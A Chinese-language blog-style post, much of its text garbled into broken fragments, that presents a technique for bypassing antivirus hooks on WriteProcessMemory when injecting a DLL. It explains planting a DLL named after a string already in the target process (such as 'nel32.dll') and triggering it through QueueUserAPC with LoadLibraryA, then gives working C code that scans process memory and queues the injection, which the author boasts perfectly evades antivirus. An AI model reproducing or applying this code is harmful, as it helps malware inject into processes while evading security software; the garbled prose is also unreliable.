目



數(shù)

殺軟都

hook NtWriteVirtualMemory

NtUserSetWindowsHookAW、NtUserSetWindowsHookE

防止代碼注入。
關(guān)于代碼注入Ring3層
主
有:
l 遠(yuǎn)程線程CreateRemoteThread
l 消息鉤子SetWindowsHookEx
l Ring3 APC QueueUserApc
l 修改線程
文SetContextThread
其
第
種
第三種
需
傳入
個(gè)param,但
求這個(gè)param必須
目標(biāo)進(jìn)程
存空間,


些
比較笨重,直接
目標(biāo)進(jìn)程VirtualAllocEx
存,然
希望
參數(shù)
容
入這個(gè)
存,使
WriteProcessMemory函數(shù),而這個(gè)函數(shù)
被hook
,所以殺軟
以
容易
攔截代碼注入行
。
仔細(xì)想想,殺軟
這種防御
失敗
!原因



個(gè)param,攻擊
完全沒有必
做這么
動(dòng)作去目標(biāo)進(jìn)程
存空間申
存并
存,
思考
否
以不
WriteProcessMemory函數(shù)呢?反

目
就
得
個(gè)合理
param,并且這個(gè)param
目標(biāo)進(jìn)程
存空間即
!
思考
,原
切
這么容易啊,哈哈!樂
半天~~~
舉個(gè)例子:假設(shè)
這樣注入
:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
想讓
面
param
容
個(gè)“xxx.dll”,就
以
,而且
求這個(gè)param
目標(biāo)進(jìn)程
存空間
您想
么?哈哈
答案:直接
目標(biāo)進(jìn)程搜索
個(gè)這樣
字符串“nel32.dll”就
以啦!因
“kernel32.dll” 這樣
字符串
定存
,那么

“kernel32.dll” 不
樣,那就隨便使

“nel32.dll”,或
“el32.dll”,都
以
啊!最
往windows目錄
面撂進(jìn)入
個(gè)nel32.dll,這樣注入
部分殺軟都
不能攔截
!哈哈!

段程序,做
個(gè)試驗(yàn),僅測試
趨勢(shì),完美繞過!其實(shí)殺軟稍
測試。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不
目標(biāo)進(jìn)程
存
//直接
目標(biāo)進(jìn)程
搜索出 nel32.dll 這樣
字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//獲得該進(jìn)程
基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %sn",processName,me.szModule);
//
得進(jìn)程模塊基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08Xn",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %sn",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL
指定進(jìn)程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%dn", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
}